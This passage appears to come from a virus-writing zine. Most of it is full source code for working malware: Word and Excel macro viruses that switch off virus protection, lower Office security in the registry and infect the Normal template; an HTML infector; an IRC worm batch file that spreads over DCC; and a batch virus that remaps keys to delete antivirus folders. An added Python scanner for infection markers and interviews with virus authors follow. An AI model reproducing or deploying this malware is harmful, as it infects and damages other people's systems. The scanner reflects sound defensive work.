Set M = FSO.GetFile(Member.Path)
M.Attributes = (M.Attributes And 1) - 1
M.Delete
End If
Ext = UCase(FSO.GetExtensionName(Member.Name))
If Ext = "HTML" Or Ext = "HTM" Then
Set M = FSO.OpenTextFile(Member.Path,1)
C = M.ReadAll
If InStr(1,C,MSBound) = 0 Then
Set M = FSO.CreateTextFile(Member.Path, True)
M.WriteLine MSBound & C
M.Close
End If
End if
Next
End Sub

Private Function ReplaceWithIn(CurChar,NewChar,SourceString)


Dim T,TMP
T = 1
TMP = SourceString
Do While T > 0
T = InStr(T, TMP, CurChar)
If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)
Loop
ReplaceWithIn = TMP
End Function

'MSBound by Suppa.
-->
</SCRIPT>

<HTML>
<HEAD><TITLE>MSBound</TITLE></HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR>
<CENTER><TABLE BORDER=0 BGCOLOR="#000000" CELLPADDING=10>
<TR><TD>
<FONT COLOR="#FF0000">
<U><B><FONT COLOR="#FF0000"> MSBound by Suppa.</B></U>
<BR><BR><BR>
This is the parent HTML file containing MSBound written by Suppa.<BR>
Feel free do to what you want with it, but don't blame me if it comes back to you.<BR>
<BR>
Special thanks go out to Gigabyte for getting me interested in these things.<BR>
</FONT>
</TD></TR>
</TABLE></CENTER>
</BODY>
</HTML>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long
Private Sub Document_Open()
' LSD
' By The WalruS 09/00 v1.00

On Error Resume Next

Randomize

If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub

Select Case Application.Version

Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False

Case "8.0"
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
End Select

With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = False
End With

KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "

Set nor = NormalTemplate.VBProject.vbcomponents(1).CodeModule


Set doc = ActiveDocument.VBProject.vbcomponents(1).CodeModule

ChangeHook = Int(Rnd * 2)
Select Case ChangeHook

Case 0
Hook = "Private Sub Document_Open()"

Case 1
Hook = "Private Sub Document_Close()"

End Select

Open "C:\Windows\" & Day(Now) & ".sys" For Output As #1


Print #1, "Private Declare Function SetSysColors Lib ""user32"" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long"
Print #1, Hook
Print #1, VBProject.vbcomponents(1).CodeModule.Lines(3, 110)
Close #1
If nor.Lines(3, 1) <> "' LSD" Then
nor.DeleteLines 1, nor.CountOfLines
nor.AddFromFile ("C:\Windows\" & Day(Now) & ".sys")
NormalTemplate.Save
ElseIf doc.Lines(3, 1) <> "' LSD" Then
doc.DeleteLines 1, doc.CountOfLines
doc.AddFromFile ("C:\Windows\" & Day(Now) & ".sys")
End If

With Dialogs(wdDialogFileSummaryInfo)
.Author = "WalruS"
.Title = "CandyFlippin"
.Execute
End With

TimeCheck = Second(Now)
One = Left(TimeCheck, 1)
Two = Right(TimeCheck, 1)
If One = Two Then Call CandyFlip

NormalTemplate.Saved = True
If ActiveDocument.Saved <> True Then ActiveDocument.Save

End Sub

Private Sub CandyFlip()


On Error Resume Next
a = SetSysColors(1, 1, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 2, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 3, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 4, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 5, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 6, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 7, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 8, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 9, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 10, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 11, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 12, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 13, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 14, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 15, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 16, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 17, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 18, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 19, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 20, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 21, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 22, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 23, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 24, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 25, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 26, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 27, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
End Sub
'Aida
Private Sub Document_Open(): With Options: Const nula = 0
.VirusProtection = nula
End With: Dim a, b, c, d
a = Strings.RTrim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, _
ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines))
With NormalTemplate.VBProject.VBComponents(1).CodeModule
c = .Lines(1, 1)
If c <> "'Aida" Then
.DeleteLines 1, NormalTemplate.VBProject.VBComponents(1) _
.CodeModule.CountOfLines
.InsertLines 1, a
End If
End With
With ActiveDocument.VBProject.VBComponents(1).CodeModule
d = .Lines(1, 1)
If d <> "'Aida" Then
.DeleteLines 1, ActiveDocument.VBProject.VBComponents(1) _
.CodeModule.CountOfLines
.InsertLines 1, a
End If: End With
If Day(Now()) = 14 And Month(Now()) = 9 Then
With Selection
.Font.Bold = True: .Font.Color = wdColorViolet
.Font.Size = 26: .Font.Emboss = True
.Font.Animation = wdAnimationSparkleText
.Font.Shadow = True: .ParagraphFormat.Alignment = wdAlignParagraphCenter
Selection.Text = "Aida: Where ever You are, You are only one that I loved truely!"
End With
End If
'WM97/2K.Aida by e[ax]
'Pozdravljam sve pri BiHNet.Org-u!
'Greetz to all ppl on #virus and VX-scene!
'"Kad sve izgleda da umire, ono se ustvari radja" - e[ax]
End Sub
'e[ax]
Private Sub Document_open()
Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXU
Set CHSJEUR = ThisDocument.VBProject.VBComponents(1).CodeModule
Set OCKAJRF = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set LCXJSIE = ActiveDocument.VBProject.VBComponents(1).CodeModule
KVICKJS = Strings.Trim(CHSJEUR.lines(1, CHSJEUR.countoflines))
SIFDMXU = Strings.LCase("'e[ax]")
If SIFDMXU <> OCKAJRF.lines(1, 1) Then
With OCKAJRF
.deletelines 1, OCKAJRF.countoflines
.insertlines 1, KVICKJS
End With
End If
If SIFDMXU <> LCXJSIE.lines(1, 1) Then
With LCXJSIE
.deletelines 1, LCXJSIE.countoflines
.insertlines 1, KVICKJS
End With
End If
'WM97/2K.String by e[ax]
'SIM v1.0 [String Infection Method] by e[ax]
'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax
'H4dija, te ostale pri BIHnet.ORG-u
'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead5, Mist, mort-
'nala, Giga, LifeWire, Fulvian, Staggle, SlageHamm, Perikles, Evul, and to all ppl on #virus
'10x once again for inspiration...
'VicES: Where ar u man!?
End Sub
Private Sub document_open(): Const nula = 0
Dim a, b, c, d: Set b = ThisDocument: Options.VirusProtection = nula
If b = ActiveDocument Then Set c = NormalTemplate Else Set c = ActiveDocument
d = b.VBProject.vbcomponents(1).codemodule.lines(1, _
b.VBProject.vbcomponents(1).codemodule.countoflines): a = Strings.LCase(d)
With c.VBProject.vbcomponents(1).codemodule
If .lines(14, 1) <> "'string2" Then
With c.VBProject.vbcomponents(1).codemodule
.deletelines 1, c.VBProject.vbcomponents(1).codemodule.countoflines
.insertlines 1, a
End With
End If
End With
End Sub
'string2
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "Blade"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Private Sub Document_Close()
On Error Resume Next
'Class.Blade
'code by Necronomikon
'greetz to:Gigabyte,jackie,SnakeByte,Lys Kovick,SerialKiller,Perikles,-KD-,SnakeMan,SlageHammer,dageshi,Ratter,#virus,#shadowvx,[6oCKeR],Fii7e,LISP
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
Options.ConfirmConversions = False
Options.VirusProtection = False
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.SaveNormalPrompt = False
Options.BlueScreen = True: Application.WindowState = wdWindowStateMaximize
CommandBars("Tools").Controls("Macro").Enabled = (99 - 99): CommandBars("File").Controls("Print Preview").Enabled = (99 - 99): CommandBars("Edit").Controls("Select All").Enabled = (99 - 99)
CommandBars("Edit").Controls("Undo VBA-Selection.TypeText").Enabled = (99 - 99): CommandBars("Tools").Controls("Word Count...").Enabled = (99 - 99): CommandBars("Tools").Controls("Options...").Enabled = (99 - 99)
For Each Target In Application.VBE.VBProjects
If Target.VBComponents(1).CodeModule.Lines(1, 1) = "" Then Target.VBComponents(1).CodeModule.addfromstring, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 26)
Next
For i = 1 To Documents.Count
If Documents(i).Saved = False Then Documents(i).SaveAs Documents(i).FullName
Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\ControlPanel\Desktop", "MenuShowDelay") = "10000"
End Sub
Private Sub Document_Open()
y = y + 1
Set a = Word.Application.Application
Set j = a.MacroContainer
Set k = j.VBProject.vbcomponents(y)
Set c = k.codemodule
If j = a.NormalTemplate Then Set i = a.ActiveDocument Else Set i = a.NormalTemplate
Set e = i.VBProject
a.Options.VirusProtection = vbEmpty
a.Options.SaveNormalPrompt = vbEmpty
With e.vbcomponents(y).codemodule
If Not .lines(16, y) Like "'L*m*" Then .deletelines y, .countoflines: .insertlines y, c.lines(y, 19)
End With
If InStr(y, VBA.Time, "5") Then MsgBox "I'm so happy 'cause today I found my friends, they are in my head." & vbCrLf & "I'm so ugly, thats ok 'cause so are you. Broken mirrors." & vbCrLf & "Sunday morning is every day for all I care and I'm not scared." & vbCrLf & "Light my candles in a days 'cause I forgot...", vbInformation, "Lithium"
End Sub
'Lithium / (c) 1999 jackie
'(Prove sample of Anti-Bloodhound code)
'No backdrops and no lights can focus
'on that shit...Linezer0 Oldskewl Tribe

' ---[snip]---

' Hi there kids, this some very old werk to show you how to code anti-
' bloodhound-heuristically. Well, it's just a basic example to prove
' that it's possible to bypass that heuristic. xD Just check it out and
' enjoy!

' Whatever tomorrow brings,


' jackie
'fireal
Private Sub Workbook_Open()
On Error Resume Next
For Each fireal In ThisWorkbook.VBProject.VBComponents
If fireal.Properties.Count = 73 Then ourcode = fireal.codemodule.Lines(1, 20)
Next
For Each book In Workbooks
For Each fireal In book.VBProject.VBComponents
If fireal.Properties.Count = 73 And fireal.codemodule.Lines(1, 1) <> "'fireal" Then
fireal.codemodule.deletelines 1, fireal.codemodule.countoflines
fireal.codemodule.insertlines 1, ourcode
If book.Path = "" Then book.SaveAs book.FullName Else book.Save
End If
Next
Next
End Sub
'x97m.fireal (c) 1999 jackie
'1st language independent excel class infector
'No backdrops and no lights can focus on that shit...Linezer0 '1999

' ---[snip]---

' Hi there kids, same as Lithium, I just can present you some old werk
' because of that damn zip disk crash. Hope you can enjoy this language
' independent x97m. Catch y'all around.

' Do you know how I feel,


' jackie
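Editor's note on the macro and HTML listings above (Neclovek, Unperson, MSBound, LSD, Aida, String, String2, Blade, Lithium, fireal): each of them decides whether a module is already infected by comparing one fixed line of the target with its own marker, and that same comparison is a ready-made detection signature. The scanner below is an added example written for this edition, not code from the zine or from any of the authors; it assumes the VBA module text has already been exported from the document (for instance with olevba from oletools, a step not shown here) and that HTML files are read as plain text. Sample inputs are constructed inline.

```python
"""Infection-marker scanner for the macro and HTML listings above.

Added example, not code from the zine. Each macro sample decides whether a
module already carries it by comparing one fixed line with its own marker:
LSD checks line 3 for "' LSD", Aida line 1 for "'Aida", String line 1 for
"'e[ax]", String2 line 14 for "'string2", Lithium line 16 Like "'L*m*",
fireal line 1 for "'fireal"; Neclovek/Unperson instead append ": IT" to every
procedure header, and MSBound looks for its own <SCRIPT> block at the top of
each HTML file. The same comparisons serve as detection signatures. Input is
assumed to be VBA module text already exported from the document (for example
with olevba from oletools; that step is not shown) or raw HTML text.
"""
import fnmatch
import re
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass(frozen=True)
class Marker:
    name: str
    line_no: Optional[int]          # 1-based line the sample inspects; None = any line
    matches: Callable[[str], bool]  # comparison the sample performs on that line


def _equals(expected: str) -> Callable[[str], bool]:
    return lambda line: line == expected


def _like(pattern: str) -> Callable[[str], bool]:
    # VBA Like under Option Compare Binary is case-sensitive; fnmatchcase gives
    # the same * wildcard semantics for the pattern Lithium uses.
    return lambda line: fnmatch.fnmatchcase(line, pattern)


VBA_MARKERS: List[Marker] = [
    Marker("WM97.LSD", 3, _equals("' LSD")),
    Marker("WM97/2K.Aida", 1, _equals("'Aida")),
    Marker("WM97/2K.String", 1, _equals("'e[ax]")),
    # The sample compares line 14 only; accepting the marker on any line is the
    # safer detection because the line number shifts with the host module.
    Marker("WM97/2K.String2", None, _equals("'string2")),
    Marker("WM97.Lithium", 16, _like("'L*m*")),
    Marker("XM97.Fireal", 1, _equals("'fireal")),
]

# Neclovek and Unperson leave no comment marker; they add an IT() function and
# rewrite every other procedure header to "...: IT". Detect that combination.
_IT_DEF = re.compile(r"^\s*Private\s+Function\s+IT\(\)\s*$", re.M)
_IT_HOOK = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+\w+.*:\s*IT\s*$", re.M)

MSBOUND_MARKER = "'MSBound by Suppa."


def scan_vba_module(text: str) -> List[str]:
    """Return the names of every marker present in one exported VBA module."""
    lines = text.splitlines()
    hits = []
    for m in VBA_MARKERS:
        if m.line_no is None:
            if any(m.matches(line) for line in lines):
                hits.append(m.name)
        elif len(lines) >= m.line_no and m.matches(lines[m.line_no - 1]):
            hits.append(m.name)
    if _IT_DEF.search(text) and _IT_HOOK.search(text):
        hits.append("WM97.Neclovek/Unperson")
    return hits


def scan_html(text: str) -> Optional[str]:
    """MSBound prepends its whole <SCRIPT> block to .htm/.html files; flag that shape."""
    head = text.lstrip().upper()
    if head.startswith('<SCRIPT LANGUAGE="VBSCRIPT">') and MSBOUND_MARKER in text:
        return "HTML.MSBound"
    return None


# Constructed sample inputs (not real infected documents), one per marker shape.
SAMPLE_AIDA = "'Aida\nPrivate Sub Document_Open()\nEnd Sub\n"
SAMPLE_LITHIUM = "\n".join(["Private Sub Document_Open()"] + ["' filler"] * 14
                           + ["'Lithium / (c) 1999 jackie", "End Sub"])
SAMPLE_NECLOVEK = ("Private Function IT()\nEnd Function\n"
                   "Private Sub Document_Open(): IT\nEnd Sub\n")
SAMPLE_CLEAN = 'Private Sub Document_Open()\nMsgBox "hello"\nEnd Sub\n'
SAMPLE_HTML = ('<SCRIPT LANGUAGE="VBScript">\n<!--\n' + MSBOUND_MARKER
               + "\n-->\n</SCRIPT>\n<HTML><BODY>page</BODY></HTML>\n")

if __name__ == "__main__":
    for name, module in [("aida", SAMPLE_AIDA), ("lithium", SAMPLE_LITHIUM),
                         ("neclovek", SAMPLE_NECLOVEK), ("clean", SAMPLE_CLEAN)]:
        print(name, scan_vba_module(module))
    print("html", scan_html(SAMPLE_HTML))
```

The fixed-line checks are deliberately mirrored rather than loosened: a sample that only inspects line 3 will happily re-infect a module whose marker was pushed to line 4, so a scanner that knows the exact comparison also knows which hosts the sample will hit twice.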
@echo off

::IRC.HighHopes.c
::by -KD- [Metaphase VX Team & NoMercyVirusTeam]
::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii,
::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea
::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus

if errorlevel 1 goto noscr


c:
md c:\pkdown >nul
echo [script]>>c:\mirc\script.ini
echo n0=;HighHopes.a>>c:\mirc\script.ini
echo n1=;by -KD- [Metaphase VX Team & NoMercyVirusTeam]>>c:\mirc\script.ini
echo n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }>>c:\mirc\script.ini
echo n3= /dcc send $nick C:\mirc\hope.zip>>c:\mirc\script.ini
echo n4=}>>c:\mirc\script.ini
echo n5=>>c:\mirc\script.ini
echo n6=ON 1:QUIT:#:/msg $chan The grass was greener.>>c:\mirc\script.ini
echo n7=ON 1:connect: {>>c:\mirc\script.ini
echo n9= /run attrib +r +s +h C:\mirc\script.ini>>c:\mirc\script.ini
echo n10= /run attrib +r +s +h C:\mirc\hope.zip>>c:\mirc\script.ini
echo n11=}>>c:\mirc\script.ini
echo open ftp.elkhart.net>>c:\ftpme.txt
echo anonymous>>c:\ftpme.txt
echo username@nowhere.com>>c:\ftpme.txt
echo cd pub>>c:\ftpme.txt
echo cd shareware>>c:\ftpme.txt
echo binary>>c:\ftpme.txt
echo hash>>c:\ftpme.txt
echo lcd c:\pkdown>>c:\ftpme.txt
echo get pkzip204.exe>>c:\ftpme.txt
echo bye>>c:\ftpme.txt

:noscr
echo Keep this open for to have Good Luck! >>c:\highhopes1.txt
echo When it closes you will have Good Luck! >>c:\highhopes1.txt
echo Some one has high hopes for You!! >>c:\highhopes1.txt
@echo on
type c:\highhopes1.txt
@echo off
echo y| del c:\highhopes1.txt >nul
if errorlevel 1 goto noftp
%windir%\ftp.exe -s:c:\ftpme.txt >nul

:noftp
echo >>c:\highhopes.txt
echo The grass was greener. The light was brigher. >>c:\highhopes.txt
echo The taste was sweeter. The nights of wonder. >>c:\highhopes.txt
echo With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txt
echo The water flowing. The endless river. >>c:\highhopes.txt
echo For Ever And Ever..... >>c:\highhopes.txt
@echo on
type c:\highhopes.txt
@echo off
if errorlevel 1 goto nogo
echo y| del c:\highhopes.txt >nul
cd \pkdown
c:\pkdown\pkzip204.exe >nul
echo y| copy %0 c:\pkdown\highhopes.bat >nul
c:\pkdown\pkzip hope.zip highho~1.bat >nul
echo y| copy hope.zip c:\mirc >nul
cd \
echo y| del c:\pkdown\*.* >nul
rd c:\pkdown >nul
echo y| del c:\ftpme.txt >nul
nogo:
@echo off
cls
@echo off%_FukThat%

::###########################################

::Fuck That 1.0a

::Deloss / NuKE

::This virus goes out to Ruzz and his

::fucked up policies of with who his members

::in Shadowvx can and cannot speak to.

::Free The Tree Frogs!

::###########################################

if '%1=='FukThat goto FukThat%2

set FukThat=%0.bat

if not exist %FukThat% set FukThat=%0

if '%FukThat%==' set FukThat=autoexec.bat

if exist c:\_FukThat.bat goto FG

if not exist %FukThat% goto FZ

find "FukThat"<%FukThat%>c:\_FukThat.bat

attrib c:\_FukThat.bat +h

:FG

command /c c:\_FukThat F V . .. \ %path%

:FZ

set FukThat=

goto FE

:FV

shift%_FukThat%

if '%2==' exit FukThat

for %%a in (%2\*.bat %2*.bat) do call c:\_FukThat F I %%a

goto FV

:FI

find "FukThat"<%3>nul

if not errorlevel 1 goto FE

type %3>FukThat$

echo.>>FukThat$
type c:\_FukThat.bat>>FukThat$

move FukThat$ %3>nul

:FD

echo.|date|find "12">nul.FukThat

echo DEVICE=c:\windows\command\ansi.sys>>config.sys

if errorlevel 1 goto FN

:FN

echo.|date|find "13">nul.FukThat

@echo on

echo and if they say you can't come around here say *fuck that*.

echo and if they say you can't come around me say *fuck that*.

ESC["n";"y";13p

ESC["y";"n";13p

ESC["N";"y";13p

ESC["Y";"n";13p

ESC["a";"del c:\avp";13p

ESC["e";"del c:\f-prot";13p

ESC["i";"del c:\mcafee";13p

ESC["o";"del c:\nav";13p

ESC["A";"del c:\avp";13p

ESC["E";"del c:\f-prot";13p

ESC["I";"del c:\mcafee";13p

ESC["O";"del c:\nav";13p

if errorlevel 1 goto FE

echo off

exit FukThat

:FE

Real Time Interview with Rajaat

Interviewer: Gigabyte

First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? <G>

Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path of
stonedness. I think I'll manage to become Dutch quite well ;-)

How old were you when you had your first experience with computers?

My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7
years old.

How old were you when you joined the VX scene?

I was just about your age when I conducted my first virus experiments, just before I got 18 years old.

How many viruses have you written by now.. any chance your totally drugged brain can still remember?

I cannot recall an actual number, but I think it must be around 200 or so, including minor variants.

Do you consider yourself an 'evil' or rather 'nice' VXer?

I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, I
frankly don't care if I appear to be friendly or not.

Which language do you like most for writing viruses?

Hah, that's a good question. I would like a language in which you have complete control over the code it generates, so
highly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. I
yet have to look for a free language that comes with source and generates tight code. Perl is interesting, though
extremely bloated.

Did you ever write anything destructive? If so, how do you feel about that now?

I have written one virus that did intentional damage, but after having goofed up with debug I decided for my own
good to try to make them as harmless as possible.

What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers?

I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would be
smart enough to recognize that a major part of it is written in Borland C++, instead of Pascal.

Do your family and friends know you write viruses?

Yes, they don't care as long as I leave their machines alone.

What am I doing here between these weirdos? (being the only normal person around)

I have no idea, perhaps masochism? ;-)

Do you have enemies in the scene?

Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicate
with may want to consider themselves my enemy but that makes no difference to me.

What do you think about infected users?

I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned the
necessity of installing a good scanner from a trusted source.

If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she had
caught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help
him/her out?

Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. My
hobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them to
people who are interested.

What's your favourite VX website?

www.coderz.net, it is like a portal form, just like slashdot.

Are you IRC addicted?

No, I don't think so.

How long are you planning to stay in the scene? (Out, out!! ;)

I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much I
yet would like to try out, but this mainly has to do with compilers and interpreter issues.

How big do you think my chances are to survive smoking a joint? (in %)

Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get a
try..

Can I take a picture of the cat?

If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.

Which AVers do you hate most?

I don't hate them, though it is a pity they earn money on the digital havoc we wreak.

Which of your viruses are you most proud of?

I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone in
my writing (or lack thereof) skills.

Which other viruses do you like?

I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers have
my respect.

How important is virus writing for you and does it have any influence on your life?

It has not such a great importance as it used to be for me, since my job consumes most time.

Are you in any other underground scene, except for VX? (hacking, phreaking..)

No, those things don't have my interest.

Do you have a real life?

Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash.

Which kind of movies and music do you like?

I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock.

Do you have any other hobbies?

I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can't
live on microwave food alone).

Are you married or do you have a girlfriend?

No.

Do you believe in God?

Yes, for I am my own God :-)

What's your favourite country/city?

The place I would like to be my next holiday is Curacao.

Are you getting bored yet?

No, hungry, where is the food in this pillage of papers?

What's your favourite food?

Aargh! Now questions about food while I'm starving? I like pastas and chips of course.

Do you like junk food?

By occasion, when I don't feel like cooking.

Which channel do you prefer, #vir or #virus, and why?

#virus, by lack of knowledge what the other channel is for.

What do you like most about the scene and writing viruses?

The broad scale of different people involved.

Is there anything else you want to mention?

Not right now, I'll mail you when I come to think of something.

Any greetings or hate messages?

Hate to McDonalds, for not grilling their burgers :-)

Thanks for the interview :)

You're welcome, let's have dinner, Gigabyte :-)


Interview with Raid/SLAM, about Irok

Interviewer: Gigabyte

First of all, how did you come up with the name 'Irok'?

It was named after an american car. The iroc-z camaro


I simply named it irok ;p

What about the virus are you personally most proud of?

I'm proud of the fact that avers had no idea what its payloads did for a very long time.
some of them still have incorrect descriptions ;p

How long did it take you to write the virus?

a little over 2 weeks on/off coding

Which part was the most tricky to write?

The memory management section. It's a bitch because of all the little routines inside irok.

Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funny
that happened, habits, etc.), and if so, did you do this in Irok?

Yes, and yes.


Irok contains the payload which fits the mood I was in at the time of writing it.

Did you get any positive or negative reactions on the virus payload from other VXers?

I guess it was an even split.


Rhape bitched about it, but fuck him.
rather, fuck anybody who doesn't like my code. I don't care. ;p

What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers?

oh hehehe, one second

When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this message
is from lyrics of the song 'Aenema' by band 'Tool'. We won't reproduce the message here as the song seriously needs
the Parental Advisory sticker for explicit lyrics.

Hahahahahaha

tis funny, no? :)

it sure is

Which AV was that from?

http://www.Europe.F-Secure.com/v-descs/irok.htm

Do you think Irok is better than Toadie?

hmm, no
toadie was funnier
iroks mean ;p

On which points is Irok better than other viruses, and what are its weak points?

It's better than some other viruses by default because it works as designed...
its weak points would be the memory it requires, and its size.
and the fact that it's not polymorphic.

Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame that
they weren't worth any attention at all, and which ones do you respect?

shrug...
The vbs viruses suck in my opinion.
As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people.

What do you consider the most important advantage and disadvantage compared to ASM viruses?

advantage... total control of the pc, disadvantage, takes a long time to write a good one.

How do you think most infected users caught the virus?

probably got greedy


decided to download a crack or something.

If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok by
running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?

Nope
I have little/nothing to do with my family.

What about friends?

I don't have many friends.


I think I know 3 people who I really consider as friends.
the rest are.. mostly acquaintances.

Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with the
language it's written in, as ASIC isn't common for viruses?

Yep
and I think perhaps they don't know asm as well as they claim.

How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride,
stress)?

Virus writing and smoking pot keep me alive.


Irok had no influence on anything. it was an accomplishment for me.

Are you planning to write any more Irok versions?

probably not.

Is there anything else you want to mention about Irok?

Yes. For those of you who got hit by it, I hope you lost everything.

Any greetings or hate messages?

Oh yes
Greetings to : heh, Nobody
Hatez goes out to: Most of you on both sides, fuck you all.
So much for political correctness eh? <g>

Thanks a lot for the interview :)


Interview with The Unforgiven

Interviewer: Gigabyte

Heya.. To start with, what do you occupy with lately?

Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult.

Which of your viruses are you most proud of?

None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not me
in person though.

Some of your viruses were pretty destructive. How do you think about that now?

I don't really think anything about it since it's all behind me. I much rather live in the present than in the past.

Do you think the VX scene has changed a lot in all those years and do you think it was better then or now?

I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though not
really qualified to make such a comparison.

However, I don't really think you can compare things now and then, if a person starts writing viruses now, he might
fancy the scene as much as I did back in 1993.

What do you think about all the Internet related viruses now and do you think there will be much more of them?

Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see more
virus alike programs circulating on the net in the future.

Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet
(un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amount
of time.

Which old viruses do you like and which new ones?

I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for me
and most other Immortal Riot guys is nowadays strictly business.

Which virus authors and groups do you respect?

Everyone who deserves it. Further information about this can be read in our ezines called Insane Reality, which can all be
found at our site located at http://www.coderz.net/ImmortalRiot.

What made you decide to start Immortal Riot?

Curiosity, I think. I'm a very curious person about pretty much everything.

How important was virus writing for you?

Compared with what? Viruswriting was a hobby, the scene was our playground and viruswriting the ticket to
acceptance.

Did you base your viruses or virus payloads on real life issues?

